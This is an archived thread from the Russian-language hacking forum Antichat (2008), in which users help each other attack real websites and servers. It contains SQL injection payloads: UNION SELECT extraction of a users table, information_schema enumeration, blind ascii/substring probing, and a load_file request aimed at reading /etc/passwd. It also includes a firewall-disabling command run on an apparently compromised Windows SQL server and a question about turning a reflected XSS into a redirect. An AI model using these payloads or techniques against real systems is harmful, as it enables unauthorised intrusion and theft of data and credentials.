ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.11.2008, 19:31
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Что-то блокирует пинги и тд. В процессах я не обнаружил нестандартных firewall'ов. А стандартный вырубил (предполагаю  ) командой netsh firewall set opmode disable
Вот перечень процессов:
--------------------------------------------------------------
> tasklist
hex code : 0x7461736b6c697374
--------------------------------------------------------------
Directory listing
--------------------------------------------------------------
smss.exe 276 Console 0 448 K
csrss.exe 324 Console 0 3,884 K
winlogon.exe 348 Console 0 11,668 K
services.exe 396 Console 0 12,264 K
lsass.exe 408 Console 0 8,216 K
svchost.exe 584 Console 0 2,760 K
svchost.exe 648 Console 0 3,340 K
svchost.exe 728 Console 0 4,676 K
svchost.exe 764 Console 0 5,008 K
svchost.exe 780 Console 0 25,320 K
spoolsv.exe 932 Console 0 5,172 K
msdtc.exe 956 Console 0 4,884 K
svchost.exe 1164 Console 0 2,172 K
FPAVServer.exe 1184 Console 0 46,464 K
FreeFTPDService.exe 1216 Console 0 4,444 K
inetinfo.exe 1244 Console 0 13,132 K
sqlservr.exe 1324 Console 0 1,556,928 K
svchost.exe 1820 Console 0 1,316 K
winvnc4.exe 1108 Console 0 3,308 K
mssearch.exe 1428 Console 0 1,116 K
sqlagent.exe 1736 Console 0 4,852 K
svchost.exe 2072 Console 0 4,752 K
distrib.exe 2360 Console 0 6,736 K
logread.exe 2400 Console 0 6,324 K
distrib.exe 2444 Console 0 6,536 K
wmiprvse.exe 2624 Console 0 6,640 K
svchost.exe 2840 Console 0 3,936 K
logon.scr 3684 Console 0 1,660 K
cmd.exe 3648 Console 0 1,496 K
more.com 3704 Console 0 5,392 K
cmd.exe 3252 Console 0 1,492 K
--------------------------------------------------------------
Есть подозрение на FPAVServer.exe, но вроде как это антивирус. |
|
|
13.11.2008, 19:39
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
попробуй совет [Raz0r]
http://site.com/script.asp?id=1 or 1=(select HOST_NAME())--
a еще попробуй через cmd ipconfig
Последний раз редактировалось truelamer; 13.11.2008 в 19:45..
|
|
|
|
13.11.2008, 19:45
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Пробовал. Ответ - ALFIE.
Возможно сервер действительно только локальный и доступа ко внешке у него нет. ipconfig я в первую очередь делал Но он мне выдал DNS-суффикс и локальный адрес.
Можно-ли ченить с этого поднять? Или без вариантов? |
|
|
|
14.11.2008, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
|
|
|
|
14.11.2008, 00:20
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Tigger
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
1+union+select+1,2,3,4,5,UNHEX(HEX(name)),7,8,9,10 +from+users/*
|
|
|
|
14.11.2008, 08:35
|
|
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983
Репутация:
5
|
|
Parse error: syntax error, unexpected T_ELSE in /home/u19620/xxx/www/edct/themes/10341d4b9666601999076f0da323fd5a/bfa-roundtabs/index.php on line 6
дает ли что-то такая ошибка привыполнении следующего запроса:
|
|
|
|
14.11.2008, 10:24
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
2pingvincible
Это означает что else испаользуется в коде без if
ни чего ты запросами вида http://site.com/?cat=4-1 не сможешь сделать
|
|
|
|
14.11.2008, 10:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Кроме раскрытия путей ничего не даёт..
|
|
|
|
15.11.2008, 14:45
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Один очень интересный мне сайт имеет багу, инъекция слепая.
кавычки:
1) слешируются
2) подстановка кавычек обрабатывается и выдает пустую страницу.
http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1--
всего одна таблица. надо вытащить её название и после колонок в ней.
http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
юзера, систем_юзера подобрал. версия мускль 5.
http://site.ru/index.php?act=25+union+select+load_file(0x2F6574632F706173737764)--
особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации.
За помощь + обеспечен -)
|
|
|
|
15.11.2008, 14:56
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744
Репутация:
246
|
|
я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
